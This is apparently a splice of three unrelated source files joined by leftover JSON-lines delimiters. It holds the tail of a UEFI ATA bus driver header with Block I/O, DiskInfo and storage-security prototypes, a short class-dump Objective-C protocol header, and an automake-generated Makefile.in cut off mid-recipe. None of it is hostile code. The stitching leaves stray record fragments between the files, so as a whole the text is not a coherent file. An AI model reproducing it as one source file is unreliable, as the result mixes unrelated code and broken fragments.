be\r\n returned.\r\n\r\n @param ChildHandle[in] The handle of the child controller to retrieve\r\n the name of. This is an optional parameter that\r\n may be NULL. It will be NULL for device\r\n drivers. It will also be NULL for a bus drivers\r\n that wish to retrieve the name of the bus\r\n controller. It will not be NULL for a bus\r\n driver that wishes to retrieve the name of a\r\n child controller.\r\n\r\n @param Language[in] A pointer to a Null-terminated ASCII string\r\n array indicating the language. This is the\r\n language of the driver name that the caller is\r\n requesting, and it must match one of the\r\n languages specified in SupportedLanguages. The\r\n number of languages supported by a driver is up\r\n to the driver writer. 
Language is specified in\r\n RFC 4646 or ISO 639-2 language code format.\r\n\r\n @param ControllerName[out] A pointer to the Unicode string to return.\r\n This Unicode string is the name of the\r\n controller specified by ControllerHandle and\r\n ChildHandle in the language specified by\r\n Language from the point of view of the driver\r\n specified by This.\r\n\r\n @retval EFI_SUCCESS The Unicode string for the user readable name in\r\n the language specified by Language for the\r\n driver specified by This was returned in\r\n DriverName.\r\n\r\n @retval EFI_INVALID_PARAMETER ControllerHandle is NULL.\r\n\r\n @retval EFI_INVALID_PARAMETER ChildHandle is not NULL and it is not a valid\r\n EFI_HANDLE.\r\n\r\n @retval EFI_INVALID_PARAMETER Language is NULL.\r\n\r\n @retval EFI_INVALID_PARAMETER ControllerName is NULL.\r\n\r\n @retval EFI_UNSUPPORTED The driver specified by This is not currently\r\n managing the controller specified by\r\n ControllerHandle and ChildHandle.\r\n\r\n @retval EFI_UNSUPPORTED The driver specified by This does not support\r\n the language specified by Language.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBusComponentNameGetControllerName (\r\n IN EFI_COMPONENT_NAME_PROTOCOL *This,\r\n IN EFI_HANDLE ControllerHandle,\r\n IN EFI_HANDLE ChildHandle OPTIONAL,\r\n IN CHAR8 *Language,\r\n OUT CHAR16 **ControllerName\r\n );\r\n\r\n\r\n/**\r\n Reset the Block Device.\r\n\r\n @param This Indicates a pointer to the calling context.\r\n @param ExtendedVerification Driver may perform diagnostics on reset.\r\n\r\n @retval EFI_SUCCESS The device was reset.\r\n @retval EFI_DEVICE_ERROR The device is not functioning properly and could\r\n not be reset.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoReset (\r\n IN EFI_BLOCK_IO_PROTOCOL *This,\r\n IN BOOLEAN ExtendedVerification\r\n );\r\n\r\n\r\n/**\r\n Read BufferSize bytes from Lba into Buffer.\r\n\r\n @param This Indicates a pointer to the calling context.\r\n @param MediaId Id of the media, changes every time the media is replaced.\r\n @param Lba The starting Logical Block Address to read from\r\n @param BufferSize Size of Buffer, must be a multiple of device block size.\r\n @param Buffer A pointer to the destination buffer for the data. The caller is\r\n responsible for either having implicit or explicit ownership of the buffer.\r\n\r\n @retval EFI_SUCCESS The data was read correctly from the device.\r\n @retval EFI_DEVICE_ERROR The device reported an error while performing the read.\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n @retval EFI_MEDIA_CHANGED The MediaId does not matched the current device.\r\n @retval EFI_BAD_BUFFER_SIZE The Buffer was not a multiple of the block size of the device.\r\n @retval EFI_INVALID_PARAMETER The read request contains LBAs that are not valid,\r\n or the buffer is not on proper alignment.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoReadBlocks (\r\n IN EFI_BLOCK_IO_PROTOCOL *This,\r\n IN UINT32 MediaId,\r\n IN EFI_LBA Lba,\r\n IN UINTN BufferSize,\r\n OUT VOID *Buffer\r\n );\r\n\r\n\r\n/**\r\n Write BufferSize bytes from Lba into Buffer.\r\n\r\n @param This Indicates a pointer to the calling context.\r\n @param MediaId The media ID that the write request is for.\r\n @param Lba The starting logical block address to be written. 
The caller is\r\n responsible for writing to only legitimate locations.\r\n @param BufferSize Size of Buffer, must be a multiple of device block size.\r\n @param Buffer A pointer to the source buffer for the data.\r\n\r\n @retval EFI_SUCCESS The data was written correctly to the device.\r\n @retval EFI_WRITE_PROTECTED The device can not be written to.\r\n @retval EFI_DEVICE_ERROR The device reported an error while performing the write.\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n @retval EFI_MEDIA_CHNAGED The MediaId does not matched the current device.\r\n @retval EFI_BAD_BUFFER_SIZE The Buffer was not a multiple of the block size of the device.\r\n @retval EFI_INVALID_PARAMETER The write request contains LBAs that are not valid,\r\n or the buffer is not on proper alignment.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoWriteBlocks (\r\n IN EFI_BLOCK_IO_PROTOCOL *This,\r\n IN UINT32 MediaId,\r\n IN EFI_LBA Lba,\r\n IN UINTN BufferSize,\r\n IN VOID *Buffer\r\n );\r\n\r\n\r\n/**\r\n Flush the Block Device.\r\n\r\n @param This Indicates a pointer to the calling context.\r\n\r\n @retval EFI_SUCCESS All outstanding data was written to the device\r\n @retval EFI_DEVICE_ERROR The device reported an error while writing back the data\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoFlushBlocks (\r\n IN EFI_BLOCK_IO_PROTOCOL *This\r\n );\r\n\r\n/**\r\n Reset the Block Device throught Block I/O2 protocol.\r\n\r\n @param[in] This Indicates a pointer to the calling context.\r\n @param[in] ExtendedVerification Driver may perform diagnostics on reset.\r\n\r\n @retval EFI_SUCCESS The device was reset.\r\n @retval EFI_DEVICE_ERROR The device is not functioning properly and could\r\n not be reset.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoResetEx (\r\n IN EFI_BLOCK_IO2_PROTOCOL *This,\r\n IN BOOLEAN ExtendedVerification\r\n );\r\n\r\n/**\r\n Read BufferSize bytes from Lba into Buffer.\r\n\r\n @param[in] This Indicates a pointer to the calling context.\r\n @param[in] MediaId Id of the media, changes every time the media is replaced.\r\n @param[in] Lba The starting Logical Block Address to read from.\r\n @param[in, out] Token A pointer to the token associated with the transaction.\r\n @param[in] BufferSize Size of Buffer, must be a multiple of device block size.\r\n @param[out] Buffer A pointer to the destination buffer for the data. 
The caller is\r\n responsible for either having implicit or explicit ownership of the buffer.\r\n\r\n @retval EFI_SUCCESS The read request was queued if Event is not NULL.\r\n The data was read correctly from the device if\r\n the Event is NULL.\r\n @retval EFI_DEVICE_ERROR The device reported an error while performing\r\n the read.\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n @retval EFI_MEDIA_CHANGED The MediaId is not for the current media.\r\n @retval EFI_BAD_BUFFER_SIZE The BufferSize parameter is not a multiple of the\r\n intrinsic block size of the device.\r\n @retval EFI_INVALID_PARAMETER The read request contains LBAs that are not valid,\r\n or the buffer is not on proper alignment.\r\n @retval EFI_OUT_OF_RESOURCES The request could not be completed due to a lack\r\n of resources.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoReadBlocksEx (\r\n IN EFI_BLOCK_IO2_PROTOCOL *This,\r\n IN UINT32 MediaId,\r\n IN EFI_LBA Lba,\r\n IN OUT EFI_BLOCK_IO2_TOKEN *Token,\r\n IN UINTN BufferSize,\r\n OUT VOID *Buffer\r\n );\r\n\r\n/**\r\n Write BufferSize bytes from Lba into Buffer.\r\n\r\n @param[in] This Indicates a pointer to the calling context.\r\n @param[in] MediaId The media ID that the write request is for.\r\n @param[in] Lba The starting logical block address to be written. The\r\n caller is responsible for writing to only legitimate\r\n locations.\r\n @param[in, out] Token A pointer to the token associated with the transaction.\r\n @param[in] BufferSize Size of Buffer, must be a multiple of device block size.\r\n @param[in] Buffer A pointer to the source buffer for the data.\r\n\r\n @retval EFI_SUCCESS The data was written correctly to the device.\r\n @retval EFI_WRITE_PROTECTED The device can not be written to.\r\n @retval EFI_DEVICE_ERROR The device reported an error while performing the write.\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n @retval EFI_MEDIA_CHNAGED The MediaId does not matched the current device.\r\n @retval EFI_BAD_BUFFER_SIZE The Buffer was not a multiple of the block size of the device.\r\n @retval EFI_INVALID_PARAMETER The write request contains LBAs that are not valid,\r\n or the buffer is not on proper alignment.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoWriteBlocksEx (\r\n IN EFI_BLOCK_IO2_PROTOCOL *This,\r\n IN UINT32 MediaId,\r\n IN EFI_LBA Lba,\r\n IN OUT EFI_BLOCK_IO2_TOKEN *Token,\r\n IN UINTN BufferSize,\r\n IN VOID *Buffer\r\n );\r\n\r\n/**\r\n Flush the Block Device.\r\n\r\n @param[in] This Indicates a pointer to the calling context.\r\n @param[in, out] Token A pointer to the token associated with the transaction.\r\n\r\n @retval EFI_SUCCESS All outstanding data was written to the device\r\n @retval EFI_DEVICE_ERROR The device reported an error while writing back the data\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoFlushBlocksEx (\r\n IN EFI_BLOCK_IO2_PROTOCOL *This,\r\n IN OUT EFI_BLOCK_IO2_TOKEN *Token\r\n );\r\n\r\n/**\r\n Terminate any in-flight non-blocking I/O requests by signaling an EFI_ABORTED\r\n in the TransactionStatus member of the EFI_BLOCK_IO2_TOKEN for the non-blocking\r\n I/O. 
After that it is safe to free any Token or Buffer data structures that\r\n were allocated to initiate the non-blockingI/O requests that were in-flight for\r\n this device.\r\n\r\n @param[in] AtaDevice The ATA child device involved for the operation.\r\n\r\n**/\r\nVOID\r\nEFIAPI\r\nAtaTerminateNonBlockingTask (\r\n IN ATA_DEVICE *AtaDevice\r\n );\r\n\r\n/**\r\n Provides inquiry information for the controller type.\r\n\r\n This function is used by the IDE bus driver to get inquiry data. Data format\r\n of Identify data is defined by the Interface GUID.\r\n\r\n @param[in] This Pointer to the EFI_DISK_INFO_PROTOCOL instance.\r\n @param[in, out] InquiryData Pointer to a buffer for the inquiry data.\r\n @param[in, out] InquiryDataSize Pointer to the value for the inquiry data size.\r\n\r\n @retval EFI_SUCCESS The command was accepted without any errors.\r\n @retval EFI_NOT_FOUND Device does not support this data class\r\n @retval EFI_DEVICE_ERROR Error reading InquiryData from device\r\n @retval EFI_BUFFER_TOO_SMALL InquiryDataSize not big enough\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaDiskInfoInquiry (\r\n IN EFI_DISK_INFO_PROTOCOL *This,\r\n IN OUT VOID *InquiryData,\r\n IN OUT UINT32 *InquiryDataSize\r\n );\r\n\r\n\r\n/**\r\n Provides identify information for the controller type.\r\n\r\n This function is used by the IDE bus driver to get identify data. Data format\r\n of Identify data is defined by the Interface GUID.\r\n\r\n @param[in] This Pointer to the EFI_DISK_INFO_PROTOCOL\r\n instance.\r\n @param[in, out] IdentifyData Pointer to a buffer for the identify data.\r\n @param[in, out] IdentifyDataSize Pointer to the value for the identify data\r\n size.\r\n\r\n @retval EFI_SUCCESS The command was accepted without any errors.\r\n @retval EFI_NOT_FOUND Device does not support this data class\r\n @retval EFI_DEVICE_ERROR Error reading IdentifyData from device\r\n @retval EFI_BUFFER_TOO_SMALL IdentifyDataSize not big enough\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaDiskInfoIdentify (\r\n IN EFI_DISK_INFO_PROTOCOL *This,\r\n IN OUT VOID *IdentifyData,\r\n IN OUT UINT32 *IdentifyDataSize\r\n );\r\n\r\n\r\n/**\r\n Provides sense data information for the controller type.\r\n\r\n This function is used by the IDE bus driver to get sense data.\r\n Data format of Sense data is defined by the Interface GUID.\r\n\r\n @param[in] This Pointer to the EFI_DISK_INFO_PROTOCOL instance.\r\n @param[in, out] SenseData Pointer to the SenseData.\r\n @param[in, out] SenseDataSize Size of SenseData in bytes.\r\n @param[out] SenseDataNumber Pointer to the value for the sense data size.\r\n\r\n @retval EFI_SUCCESS The command was accepted without any errors.\r\n @retval EFI_NOT_FOUND Device does not support this data class.\r\n @retval EFI_DEVICE_ERROR Error reading SenseData from device.\r\n @retval EFI_BUFFER_TOO_SMALL SenseDataSize not big enough.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaDiskInfoSenseData (\r\n IN EFI_DISK_INFO_PROTOCOL *This,\r\n IN OUT VOID *SenseData,\r\n IN OUT UINT32 *SenseDataSize,\r\n OUT UINT8 *SenseDataNumber\r\n );\r\n\r\n\r\n/**\r\n This function is used by the IDE bus driver to get controller information.\r\n\r\n @param[in] This Pointer to the EFI_DISK_INFO_PROTOCOL instance.\r\n @param[out] IdeChannel Pointer to the Ide Channel number. Primary or secondary.\r\n @param[out] IdeDevice Pointer to the Ide Device number. 
Master or slave.\r\n\r\n @retval EFI_SUCCESS IdeChannel and IdeDevice are valid.\r\n @retval EFI_UNSUPPORTED This is not an IDE device.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaDiskInfoWhichIde (\r\n IN EFI_DISK_INFO_PROTOCOL *This,\r\n OUT UINT32 *IdeChannel,\r\n OUT UINT32 *IdeDevice\r\n );\r\n\r\n/**\r\n Send a security protocol command to a device that receives data and/or the result\r\n of one or more commands sent by SendData.\r\n\r\n The ReceiveData function sends a security protocol command to the given MediaId.\r\n The security protocol command sent is defined by SecurityProtocolId and contains\r\n the security protocol specific data SecurityProtocolSpecificData. The function\r\n returns the data from the security protocol command in PayloadBuffer.\r\n\r\n For devices supporting the SCSI command set, the security protocol command is sent\r\n using the SECURITY PROTOCOL IN command defined in SPC-4.\r\n\r\n For devices supporting the ATA command set, the security protocol command is sent\r\n using one of the TRUSTED RECEIVE commands defined in ATA8-ACS if PayloadBufferSize\r\n is non-zero.\r\n\r\n If the PayloadBufferSize is zero, the security protocol command is sent using the\r\n Trusted Non-Data command defined in ATA8-ACS.\r\n\r\n If PayloadBufferSize is too small to store the available data from the security\r\n protocol command, the function shall copy PayloadBufferSize bytes into the\r\n PayloadBuffer and return EFI_WARN_BUFFER_TOO_SMALL.\r\n\r\n If PayloadBuffer or PayloadTransferSize is NULL and PayloadBufferSize is non-zero,\r\n the function shall return EFI_INVALID_PARAMETER.\r\n\r\n If the given MediaId does not support security protocol commands, the function shall\r\n return EFI_UNSUPPORTED. If there is no media in the device, the function returns\r\n EFI_NO_MEDIA. If the MediaId is not the ID for the current media in the device,\r\n the function returns EFI_MEDIA_CHANGED.\r\n\r\n If the security protocol fails to complete within the Timeout period, the function\r\n shall return EFI_TIMEOUT.\r\n\r\n If the security protocol command completes without an error, the function shall\r\n return EFI_SUCCESS. If the security protocol command completes with an error, the\r\n function shall return EFI_DEVICE_ERROR.\r\n\r\n @param This Indicates a pointer to the calling context.\r\n @param MediaId ID of the medium to receive data from.\r\n @param Timeout The timeout, in 100ns units, to use for the execution\r\n of the security protocol command. A Timeout value of 0\r\n means that this function will wait indefinitely for the\r\n security protocol command to execute. If Timeout is greater\r\n than zero, then this function will return EFI_TIMEOUT\r\n if the time required to execute the receive data command\r\n is greater than Timeout.\r\n @param SecurityProtocolId The value of the \"Security Protocol\" parameter of\r\n the security protocol command to be sent.\r\n @param SecurityProtocolSpecificData The value of the \"Security Protocol Specific\" parameter\r\n of the security protocol command to be sent.\r\n @param PayloadBufferSize Size in bytes of the payload data buffer.\r\n @param PayloadBuffer A pointer to a destination buffer to store the security\r\n protocol command specific payload data for the security\r\n protocol command. 
The caller is responsible for having\r\n either implicit or explicit ownership of the buffer.\r\n @param PayloadTransferSize A pointer to a buffer to store the size in bytes of the\r\n data written to the payload data buffer.\r\n\r\n @retval EFI_SUCCESS The security protocol command completed successfully.\r\n @retval EFI_WARN_BUFFER_TOO_SMALL The PayloadBufferSize was too small to store the available\r\n data from the device. The PayloadBuffer contains the truncated data.\r\n @retval EFI_UNSUPPORTED The given MediaId does not support security protocol commands.\r\n @retval EFI_DEVICE_ERROR The security protocol command completed with an error.\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n @retval EFI_MEDIA_CHANGED The MediaId is not for the current media.\r\n @retval EFI_INVALID_PARAMETER The PayloadBuffer or PayloadTransferSize is NULL and\r\n PayloadBufferSize is non-zero.\r\n @retval EFI_TIMEOUT A timeout occurred while waiting for the security\r\n protocol command to execute.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaStorageSecurityReceiveData (\r\n IN EFI_STORAGE_SECURITY_COMMAND_PROTOCOL *This,\r\n IN UINT32 MediaId,\r\n IN UINT64 Timeout,\r\n IN UINT8 SecurityProtocolId,\r\n IN UINT16 SecurityProtocolSpecificData,\r\n IN UINTN PayloadBufferSize,\r\n OUT VOID *PayloadBuffer,\r\n OUT UINTN *PayloadTransferSize\r\n );\r\n\r\n/**\r\n Send a security protocol command to a device.\r\n\r\n The SendData function sends a security protocol command containing the payload\r\n PayloadBuffer to the given MediaId. The security protocol command sent is\r\n defined by SecurityProtocolId and contains the security protocol specific data\r\n SecurityProtocolSpecificData. If the underlying protocol command requires a\r\n specific padding for the command payload, the SendData function shall add padding\r\n bytes to the command payload to satisfy the padding requirements.\r\n\r\n For devices supporting the SCSI command set, the security protocol command is sent\r\n using the SECURITY PROTOCOL OUT command defined in SPC-4.\r\n\r\n For devices supporting the ATA command set, the security protocol command is sent\r\n using one of the TRUSTED SEND commands defined in ATA8-ACS if PayloadBufferSize\r\n is non-zero. If the PayloadBufferSize is zero, the security protocol command is\r\n sent using the Trusted Non-Data command defined in ATA8-ACS.\r\n\r\n If PayloadBuffer is NULL and PayloadBufferSize is non-zero, the function shall\r\n return EFI_INVALID_PARAMETER.\r\n\r\n If the given MediaId does not support security protocol commands, the function\r\n shall return EFI_UNSUPPORTED. If there is no media in the device, the function\r\n returns EFI_NO_MEDIA. If the MediaId is not the ID for the current media in the\r\n device, the function returns EFI_MEDIA_CHANGED.\r\n\r\n If the security protocol fails to complete within the Timeout period, the function\r\n shall return EFI_TIMEOUT.\r\n\r\n If the security protocol command completes without an error, the function shall return\r\n EFI_SUCCESS. If the security protocol command completes with an error, the function\r\n shall return EFI_DEVICE_ERROR.\r\n\r\n @param This Indicates a pointer to the calling context.\r\n @param MediaId ID of the medium to receive data from.\r\n @param Timeout The timeout, in 100ns units, to use for the execution\r\n of the security protocol command. A Timeout value of 0\r\n means that this function will wait indefinitely for the\r\n security protocol command to execute. 
If Timeout is greater\r\n than zero, then this function will return EFI_TIMEOUT\r\n if the time required to execute the receive data command\r\n is greater than Timeout.\r\n @param SecurityProtocolId The value of the \"Security Protocol\" parameter of\r\n the security protocol command to be sent.\r\n @param SecurityProtocolSpecificData The value of the \"Security Protocol Specific\" parameter\r\n of the security protocol command to be sent.\r\n @param PayloadBufferSize Size in bytes of the payload data buffer.\r\n @param PayloadBuffer A pointer to a destination buffer to store the security\r\n protocol command specific payload data for the security\r\n protocol command.\r\n\r\n @retval EFI_SUCCESS The security protocol command completed successfully.\r\n @retval EFI_UNSUPPORTED The given MediaId does not support security protocol commands.\r\n @retval EFI_DEVICE_ERROR The security protocol command completed with an error.\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n @retval EFI_MEDIA_CHANGED The MediaId is not for the current media.\r\n @retval EFI_INVALID_PARAMETER The PayloadBuffer is NULL and PayloadBufferSize is non-zero.\r\n @retval EFI_TIMEOUT A timeout occurred while waiting for the security\r\n protocol command to execute.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaStorageSecuritySendData (\r\n IN EFI_STORAGE_SECURITY_COMMAND_PROTOCOL *This,\r\n IN UINT32 MediaId,\r\n IN UINT64 Timeout,\r\n IN UINT8 SecurityProtocolId,\r\n IN UINT16 SecurityProtocolSpecificData,\r\n IN UINTN PayloadBufferSize,\r\n IN VOID *PayloadBuffer\r\n );\r\n\r\n/**\r\n Send TPer Reset command to reset eDrive to lock all protected bands.\r\n Typically, there are 2 mechanism for resetting eDrive. They are:\r\n 1. TPer Reset through IEEE 1667 protocol.\r\n 2. TPer Reset through native TCG protocol.\r\n This routine will detect what protocol the attached eDrive comform to, TCG or\r\n IEEE 1667 protocol. 
Then send out TPer Reset command separately.\r\n\r\n @param[in] AtaDevice ATA_DEVICE pointer.\r\n\r\n**/\r\nVOID\r\nInitiateTPerReset (\r\n IN ATA_DEVICE *AtaDevice\r\n );\r\n\r\n#endif\r\n"} {"text": "//\n// Generated by class-dump 3.5 (64 bit) (Debug version compiled Oct 15 2018 10:31:50).\n//\n// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2015 by Steve Nygard.\n//\n\n#import \n\n@protocol CKRecordValue \n@end\n\n"} {"text": "# Makefile.in generated by automake 1.8.4 from Makefile.am.\n# @configure_input@\n\n# Copyright (C) 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002,\n# 2003, 2004 Free Software Foundation, Inc.\n# This Makefile.in is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY, to the extent permitted by law; without\n# even the implied warranty of MERCHANTABILITY or FITNESS FOR A\n# PARTICULAR PURPOSE.\n\n@SET_MAKE@\n\nsrcdir = @srcdir@\ntop_srcdir = @top_srcdir@\nVPATH = @srcdir@\npkgdatadir = $(datadir)/@PACKAGE@\npkglibdir = $(libdir)/@PACKAGE@\npkgincludedir = $(includedir)/@PACKAGE@\ntop_builddir = ..\nam__cd = CDPATH=\"$${ZSH_VERSION+.}$(PATH_SEPARATOR)\" && cd\nINSTALL = @INSTALL@\ninstall_sh_DATA = $(install_sh) -c -m 644\ninstall_sh_PROGRAM = $(install_sh) -c\ninstall_sh_SCRIPT = $(install_sh) -c\nINSTALL_HEADER = $(INSTALL_DATA)\ntransform = $(program_transform_name)\nNORMAL_INSTALL = :\nPRE_INSTALL = :\nPOST_INSTALL = :\nNORMAL_UNINSTALL = :\nPRE_UNINSTALL = :\nPOST_UNINSTALL = :\nhost_triplet = @host@\nsubdir = include\nDIST_COMMON = $(libini_include_HEADERS) $(srcdir)/Makefile.am \\\n\t$(srcdir)/Makefile.in $(srcdir)/config.h.in\nACLOCAL_M4 = $(top_srcdir)/aclocal.m4\nam__aclocal_m4_deps = $(top_srcdir)/configure.in\nam__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \\\n\t$(ACLOCAL_M4)\nmkinstalldirs = $(SHELL) $(top_srcdir)/unix/mkinstalldirs\nCONFIG_HEADER = config.h\nCONFIG_CLEAN_FILES =\nSOURCES =\nDIST_SOURCES =\nam__installdirs = \"$(DESTDIR)$(libini_includedir)\"\nlibini_includeHEADERS_INSTALL = $(INSTALL_HEADER)\nHEADERS = $(libini_include_HEADERS)\nETAGS = etags\nCTAGS = ctags\nDISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST)\nACLOCAL = @ACLOCAL@\nAMDEP_FALSE = @AMDEP_FALSE@\nAMDEP_TRUE = @AMDEP_TRUE@\nAMTAR = @AMTAR@\nAR = @AR@\nAS = @AS@\nAUTOCONF = @AUTOCONF@\nAUTOHEADER = @AUTOHEADER@\nAUTOMAKE = @AUTOMAKE@\nAWK = @AWK@\nCC = @CC@\nCCDEPMODE = @CCDEPMODE@\nCFLAGS = @CFLAGS@\nCPP = @CPP@\nCPPFLAGS = @CPPFLAGS@\nCXX = @CXX@\nCXXCPP = @CXXCPP@\nCXXDEPMODE = @CXXDEPMODE@\nCXXFLAGS = @CXXFLAGS@\nCYGPATH_W = @CYGPATH_W@\nDEFS = @DEFS@\nDEPDIR = @DEPDIR@\nDLLTOOL = @DLLTOOL@\nECHO = @ECHO@\nECHO_C = @ECHO_C@\nECHO_N = @ECHO_N@\nECHO_T = @ECHO_T@\nEGREP = @EGREP@\nEXEEXT = @EXEEXT@\nF77 = @F77@\nFFLAGS = @FFLAGS@\nINSTALL_DATA = @INSTALL_DATA@\nINSTALL_PROGRAM = @INSTALL_PROGRAM@\nINSTALL_SCRIPT = @INSTALL_SCRIPT@\nINSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@\nLDFLAGS = @LDFLAGS@\nLIBOBJS = @LIBOBJS@\nLIBS = @LIBS@\nLIBTOOL = @LIBTOOL@\nLIBVERSION = @LIBVERSION@\nLN_S = @LN_S@\nLTLIBOBJS = @LTLIBOBJS@\nMAKEINFO = @MAKEINFO@\nOBJDUMP = @OBJDUMP@\nOBJEXT = @OBJEXT@\nPACKAGE = @PACKAGE@\nPACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@\nPACKAGE_NAME = @PACKAGE_NAME@\nPACKAGE_STRING = @PACKAGE_STRING@\nPACKAGE_TARNAME = @PACKAGE_TARNAME@\nPACKAGE_VERSION = @PACKAGE_VERSION@\nPATH_SEPARATOR = 
@PATH_SEPARATOR@\nRANLIB = @RANLIB@\nSET_MAKE = @SET_MAKE@\nSHELL = @SHELL@\nSTRIP = @STRIP@\nVERSION = @VERSION@\nac_ct_AR = @ac_ct_AR@\nac_ct_AS = @ac_ct_AS@\nac_ct_CC = @ac_ct_CC@\nac_ct_CXX = @ac_ct_CXX@\nac_ct_DLLTOOL = @ac_ct_DLLTOOL@\nac_ct_F77 = @ac_ct_F77@\nac_ct_OBJDUMP = @ac_ct_OBJDUMP@\nac_ct_RANLIB = @ac_ct_RANLIB@\nac_ct_STRIP = @ac_ct_STRIP@\nam__fastdepCC_FALSE = @am__fastdepCC_FALSE@\nam__fastdepCC_TRUE = @am__fastdepCC_TRUE@\nam__fastdepCXX_FALSE = @am__fastdepCXX_FALSE@\nam__fastdepCXX_TRUE = @am__fastdepCXX_TRUE@\nam__include = @am__include@\nam__leading_dot = @am__leading_dot@\nam__quote = @am__quote@\nbindir = @bindir@\nbuild = @build@\nbuild_alias = @build_alias@\nbuild_cpu = @build_cpu@\nbuild_os = @build_os@\nbuild_vendor = @build_vendor@\ndatadir = @datadir@\nexec_prefix = @exec_prefix@\nhost = @host@\nhost_alias = @host_alias@\nhost_cpu = @host_cpu@\nhost_os = @host_os@\nhost_vendor = @host_vendor@\nincludedir = @includedir@\ninfodir = @infodir@\ninstall_sh = @install_sh@\nlibdir = @libdir@\nlibexecdir = @libexecdir@\nlocalstatedir = @localstatedir@\nmandir = @mandir@\nmkdir_p = @mkdir_p@\noldincludedir = @oldincludedir@\nprefix = @prefix@\nprogram_transform_name = @program_transform_name@\nsbindir = @sbindir@\nsharedstatedir = @sharedstatedir@\nsysconfdir = @sysconfdir@\ntarget_alias = @target_alias@\nlibini_includedir = $(includedir)\nlibini_include_HEADERS = libini.h\nEXTRA_DIST = config.h\nall: config.h\n\t$(MAKE) $(AM_MAKEFLAGS) all-am\n\n.SUFFIXES:\n$(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps)\n\t@for dep in $?; do \\\n\t case '$(am__configure_deps)' in \\\n\t *$$dep*) \\\n\t cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh \\\n\t\t&& exit 0; \\\n\t exit 1;; \\\n\t esac; \\\n\tdone; \\\n\techo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign include/Makefile'; \\\n\tcd $(top_srcdir) && \\\n\t $(AUTOMAKE) --foreign include/Makefile\n.PRECIOUS: Makefile\nMakefile: $(srcdir)/Makefile.in $(top_builddir)/config.status\n\t@case '$?' in \\\n\t *config.status*) \\\n\t cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \\\n\t *) \\\n\t echo ' cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__depfiles_maybe)'; \\\n\t cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__depfiles_maybe);; \\\n\tesac;\n\n$(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES)\n\tcd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh\n\n$(top_srcdir)/configure: $(am__configure_deps)\n\tcd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh\n$(ACLOCAL_M4): $(am__aclocal_m4_deps)\n\tcd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh\n\nconfig.h: stamp-h1\n\t@if test ! 
-f $@; then \\\n\t rm -f stamp-h1; \\\n\t $(MAKE) stamp-h1; \\\n\telse :; fi\n\nstamp-h1: $(srcdir)/config.h.in $(top_builddir)/config.status\n\t@rm -f stamp-h1\n\tcd $(top_builddir) && $(SHELL) ./config.status include/config.h\n$(srcdir)/config.h.in: $(am__configure_deps) \n\tcd $(top_srcdir) && $(AUTOHEADER)\n\trm -f stamp-h1\n\ttouch $@\n\ndistclean-hdr:\n\t-rm -f config.h stamp-h1\n\nmostlyclean-libtool:\n\t-rm -f *.lo\n\nclean-libtool:\n\t-rm -rf .libs _libs\n\ndistclean-libtool:\n\t-rm -f libtool\nuninstall-info-am:\ninstall-libini_includeHEADERS: $(libini_include_HEADERS)\n\t@$(NORMAL_INSTALL)\n\ttest -z \"$(libini_includedir)\" || $(mkdir_p) \"$(DESTDIR)$(libini_includedir)\"\n\t@list='$(libini_include_HEADERS)'; for p in $$list; do \\\n\t if test -f \"$$p\"; then d=; else d=\"$(srcdir)/\"; fi; \\\n\t f=\"`echo $$p | sed -e 's|^.*/||'`\"; \\\n\t echo \" $(libini_includeHEADERS_INSTALL) '$$d$$p' '$(DESTDIR)$(libini_includedir)/$$f'\"; \\\n\t $(libini_includeHEADERS_INSTALL) \"$$d$$p\" \"$(DESTDIR)$(libini_includedir)/$$f\"; \\\n\tdone\n\nuninstall-libini_includeHEADERS:\n\t@$(NORMAL_UNINSTALL)\n\t@list='$(libini_include_HEADERS)'; for p in $$list; do \\\n\t f=\"`echo $$p | sed -e 's|^.*/||'`\"; \\\n\t echo \" rm -f '$(DESTDIR)$(libini_includedir)/$$f'\"; 